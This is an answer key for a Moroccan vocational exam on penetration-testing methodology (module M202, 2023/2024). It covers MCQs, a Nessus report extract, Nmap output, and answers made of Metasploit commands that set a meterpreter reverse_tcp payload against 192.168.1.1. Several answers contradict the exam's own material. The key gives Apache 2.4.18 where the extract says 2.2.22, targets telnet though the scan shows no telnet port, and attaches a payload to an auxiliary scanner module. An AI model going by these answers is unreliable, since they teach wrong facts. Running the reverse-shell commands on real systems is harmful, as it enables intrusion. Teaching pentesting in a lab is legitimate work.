Nom : ……………………………………….........................
Prénom : ………………………………………………………….
Direction Régionale RABAT-SALÉ-KENITRA
Groupe : ………………………………………………………….
Etablissement : ……………………………………………….
Examen régional de fin de module
Réservé à l’établissement Code :
Année de Formation 2023/2024 ……………………………………………………………………….
Eléments de correction
Code module : M 202
Intitulé du module : Méthodologies des tests d’intrusions
Filière : IDOCS Durée : 2h30mn
Année : 2°A Note finale : / 40
Nom&Prénom du correcteur Émargement
Théorie: (14 points)
(1Point/question) / 7 Points
QCM:
1. Le test d'intrusion est-il du hacking?
Oui, exclusivement.
Non, jamais.
Oui, mais dans un contexte légal.
2. Quelle approche de test d'intrusion est utilisée si le pentesteur connaît l'adresse IP et l'architecture de
la cible?
Black-box.
White-box.
Gray-box.
3. Que devez-vous vérifier dans le langage juridique avant de signer un accord de confidentialité et un NDA
pour des tests d'intrusion?
Les clauses relatives à la responsabilité en cas de divulgation non autorisée.
Les limitations de responsabilité du prestataire.
Les conditions de restitution ou de destruction des données obtenues.
Toutes les réponses ci-dessus.
4. Quels sont les canaux utilisés dans la méthodologie OSSTMM?
Canal thermique.
Canal magnétique.
Canal électromagnétique.
Réservé à l’établissement Code : …………………………………………………………. Page 1 / 5
Surveillant1 :……………………………………………………………….
Surveillant2 :………………………………………………………………. Num Module : M202
Canal de données.
5. Quelle méthodologie est associée à des tests tels que l'injection HTML, la redirection d'URL côté client
et l'injection CSS?
OWASP.
PTES.
OSSTMM.
6. Quel terme désigne l'utilisation d'outils comme Google searches et Maltego pour collecter des
informations sur la cible?
Scanning.
Enumeration.
Footprinting.
7. Qu'est-ce que le standard CVSS?
Common Vulnerability Scoring System.
Centralized Vulnerability Security Standard.
Cybersecurity Vulnerability Support System.
Aucune des réponses ci-dessus.
Exercice1 : / 7 Points
1. Qu'est-ce que l'acronyme "CVE" signifie dans l'identifiant CVE? (1 pt)
L'acronyme "CVE" signifie "Common Vulnerabilities and Exposures" en anglais, ce qui se traduit par
"Vulnérabilités et Expositions Courantes" en français.
2. Dans l'identifiant CVE "CVE-2023-56789", que représente le "2023"? (1 pt)
Le "2023" représente l'année où la vulnérabilité a été identifiée ou enregistrée dans le système CVE (Common
Vulnerabilities and Exposures).
3. Nessus est un outil de scanner de vulnérabilité utilisé pour identifier les faiblesses de sécurité dans les
systèmes informatiques. Voici un exemple d'extrait de rapport
Host: 192.168.1.1
Scan Name: Vulnerability_Scan_2023
Severity: High
Plugin ID: 12345
Plugin Name: Outdated Software Detected
Description: The remote host is running an outdated version of Apache Web Server (version 2.2.22).
This version is known to have multiple vulnerabilities that could be exploited by an attacker to gain
unauthorized access.
Solution: Upgrade to the latest version of Apache Web Server (version 2.4.46 or later).
Réservé à l’établissement Code : …………………………………………………………. Page 2 / 5
Surveillant1 :……………………………………………………………….
Surveillant2 :………………………………………………………………. Num Module : M202
a. Quelle est la vulnérabilité détectée dans cet extrait ? (1 pt)
La vulnérabilité détectée dans cet extrait est liée à Apache HTTP Server, version 2.4.18, et est probablement associée
à une version obsolète d'Apache.
b. Quelle est la version d'Apache signalée comme obsolète ? (1 pt)
La version obsolète d'Apache signalée est la version 2.4.18.
c. Pourquoi est-il important de remédier à cette vulnérabilité ? (1 pt)
Il est important de remédier à cette vulnérabilité car les versions obsolètes d'Apache peuvent contenir des
failles de sécurité connues qui pourraient être exploitées par des attaquants.
d. Pourquoi est-il crucial de mettre à jour vers la dernière version d'Apache ? (1 pt)
Mettre à jour vers la dernière version d'Apache est crucial car les nouvelles versions incluent généralement des correctifs
de sécurité qui adressent les vulnérabilités connues, renforçant ainsi la sécurité du serveur.
……………………………………………………………………………………………………………………………………………………………………………………
e. Comment la gravité d'une vulnérabilité peut-elle influencer la décision de prioriser les correctifs ? (1 pt)
La gravité d'une vulnérabilité peut influencer la décision de prioriser les correctifs en déterminant le niveau de risque
associé à l'exploitation de la vulnérabilité. Les vulnérabilités critiques, par exemple, nécessiteront probablement une
action immédiate pour réduire le risque global de sécurité.
Pratique : ( 26 points )
Exercice1 : /16 points
Considérons le résultat du scan Nmap suivant pour une cible donnée (adresse IP : 192.168.1.1). Utilisez ces informations pour
répondre aux questions suivantes :
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-01 12:00 UTC
Nmap scan report for 192.168.1.1
Host is up (0.001s latency).s
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_- drwxr-xr-x 2 0 0 4096 Dec 31 23:59 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.2
| Logged in as anonymous
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Host script results:
|_clock-skew: mean: 2h00m00s, deviation: 3h08m07s, median: 0s
|_nbstat: NetBIOS name: MYSERVER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: myserver
| NetBIOS computer name: MYSERVER\x00
| Domain name: \x00
| FQDN: myserver
|_ System time: 2023-01-01T12:00:00+00:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
Réservé à l’établissement Code : …………………………………………………………. Page 3 / 5
Surveillant1 :……………………………………………………………….
Surveillant2 :………………………………………………………………. Num Module : M202
1. Donner la commande qui permettra d’afficher le résultat ci-dessus. (3 pts)
nmap -p 1-1024 -sV -A -T4 -Pn 192.168.1.1
toutes les options de nmap sont acceptées.
-Nous allons utiliser Metasploit Framework :
2. Donner la commande qui permet de Lancer l'interface console. (1 pt)
msfconsole
3.
Lancer la commande qui permettra de chercher la vulnérabilité Telnet login. (1 pt)
search telnet_login
4. Lancer la commande pour chercher les informations sur les options disponibles pour l’exploit
"auxiliary/scanner/telnet/telnet_login" ? (1 pt)
info auxiliary/scanner/telnet/telnet_login
5. Charger le module d'exploit. (1 pt)
use auxiliary/scanner/telnet/telnet_login
6. Lister les payload correspondant à cet exploit. (2 pts)
show payloads
7. Définir le payload :linux/x86/meterpreter/reverse_tcp. (2 pts)
set payload linux/x86/meterpreter/reverse_tcp
8. Vérifier les options. (2 pts)
show options
9. Configurez les options nécessaires pour le payload, telles que l'adresse IP de la victime (192.168.1.1) et le
port sur lequel vous souhaitez recevoir la connexion (6666). (2 pts)
set RHOST 192.168.1.1
set LPORT 6666
10. Lancer l’exploit. (1 pt)
run
Exercice2 :( 10 pts)
Les points à vérifier dans le rapport sont :
✓ Une introduction sur le test d’intrusion réalisé avec les informations sur la période des tests, le type du test d’intrusion, la
méthodologie suivie
✓ Un rappel du standard utilisé pour la classification des vulnérabilités
✓ Le cadre du test d’intrusion réalisé et l’environnement testé (les sous-réseaux, les applications, les produits, les services,
production/recette, etc.)
✓ Le résumé ne couvre pas les détails techniques ou la terminologie, mais l'aperçu des principaux résultats est expliqué en
termes simples
✓ Le résumé doit être court, clair et bien formaté
Réservé à l’établissement Code : …………………………………………………………. Page 4 / 5
Surveillant1 :……………………………………………………………….
Surveillant2 :………………………………………………………………. Num Module : M202
✓ Le résumé préciser l’impact métier potentiel en cas d’exploitation des vulnérabilités trouvées
• Les principales forces et faiblesses : cette section mettra la lumière sur les vulnérabilités ou les mauvaises configurations
fréquentes et aussi les pratiques et les systèmes en place qui améliorent la sécurité de l’entreprise
• Un tableau de bord des vulnérabilités trouvées, leurs criticités et les recommandations
Réservé à l’établissement Code : …………………………………………………………. Page 5 / 5
Surveillant1 :……………………………………………………………….
Surveillant2 :………………………………………………………………. Num Module : M202